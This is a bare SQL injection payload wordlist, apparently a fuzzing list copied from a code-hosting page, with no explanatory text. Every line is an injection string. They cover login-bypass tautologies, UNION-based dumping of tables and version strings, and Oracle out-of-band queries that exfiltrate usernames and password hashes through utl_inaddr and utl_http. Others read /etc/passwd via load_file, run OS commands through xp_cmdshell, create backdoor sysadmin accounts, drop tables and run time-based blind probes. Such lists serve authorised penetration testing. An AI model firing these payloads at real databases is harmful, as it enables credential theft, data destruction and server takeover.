167 lines
11 KiB
Plaintext
167 lines
11 KiB
Plaintext
a
|
||
a'
|
||
a' --
|
||
a' or 1=1; --
|
||
@
|
||
?
|
||
' and 1=0) union all
|
||
? or 1=1 --
|
||
x' and userid is NULL; --
|
||
x' and email is NULL; --
|
||
anything' or 'x'='x
|
||
x' and 1=(select count(*) from tabname); --
|
||
x' and members.email is NULL; --
|
||
x' or full_name like '%bob%
|
||
23 or 1=1; --
|
||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||
a
|
||
1 or 1=1
|
||
1' or '1'='1
|
||
1 and user_name() = 'dbo'
|
||
1
|
||
1'1
|
||
1 exec sp_ (or exec xp_)
|
||
1 and 1=1
|
||
1' and 1=(select count(*) from tablenames); --
|
||
1
|
||
1 and user_name() = 'dbo'
|
||
\'; desc users; --
|
||
1\'1
|
||
1' and non_existant_table = '1
|
||
' or username is not NULL or username = '
|
||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||
1 uni/**/on select all from where
|
||
’ or ‘1’=’1
|
||
' or '1'='1
|
||
'||utl_http.request('httP://192.168.1.1/')||'
|
||
' || myappadmin.adduser('admin', 'newpass') || '
|
||
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
|
||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||
||6
|
||
'||'6
|
||
(||6)
|
||
' or 1=1--
|
||
or 1=1
|
||
' or '1'='1
|
||
; or '1'='1'
|
||
" or isNULL(1/0) /*
|
||
' or '7659'='7659
|
||
" or isNULL(1/0) /*
|
||
' --
|
||
' or 1=1--
|
||
" or 1=1--
|
||
' or 1=1 /*
|
||
or 1=1--
|
||
' or 'a'='a
|
||
" or "a"="a
|
||
') or ('a'='a
|
||
admin' or '
|
||
' select * from information_schema.tables--
|
||
) union select * from information_schema.tables;
|
||
' having 1=1--
|
||
' having 1=1--
|
||
' group by userid having 1=1--
|
||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
||
' or 1 in (select @@version)--
|
||
' union all select @@version--
|
||
' or 'unusual' = 'unusual'
|
||
' or 'something' = 'some'+'thing'
|
||
' or 'text' = n'text'
|
||
' or 'something' like 'some%'
|
||
' or 2 > 1
|
||
' or 'text' > 't'
|
||
' or 'whatever' in ('whatever')
|
||
' or 2 between 1 and 3
|
||
' or username like char(37);
|
||
' union select * from users where login = char(114,111,111,116);
|
||
' union select
|
||
password:*/=1--
|
||
uni/**/on sel/**/ect
|
||
'; execute immediate 'sel' || 'ect us' || 'er'
|
||
'; exec ('sel' + 'ect us' + 'er')
|
||
'/**/or/**/1/**/=/**/1
|
||
' or 1/*
|
||
or isNULL(1/0) /*
|
||
' or '7659'='7659
|
||
" or isNULL(1/0) /*
|
||
' -- &password=
|
||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||
@var select @var as var into temp end --
|
||
' and 1 in (select var from temp)--
|
||
' union select 1,load_file('/etc/passwd'),1,1,1;
|
||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||
create user name identified by 'pass123'
|
||
create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||
' ; drop table temp --
|
||
exec sp_addlogin 'name' , 'password'
|
||
exec sp_addsrvrolemember 'name' , 'sysadmin'
|
||
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
|
||
grant connect to name; grant resource to name;
|
||
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||
' or 1=1 --
|
||
' union (select @@version) --
|
||
' union (select NULL, (select @@version)) --
|
||
' union (select NULL, NULL, (select @@version)) --
|
||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- |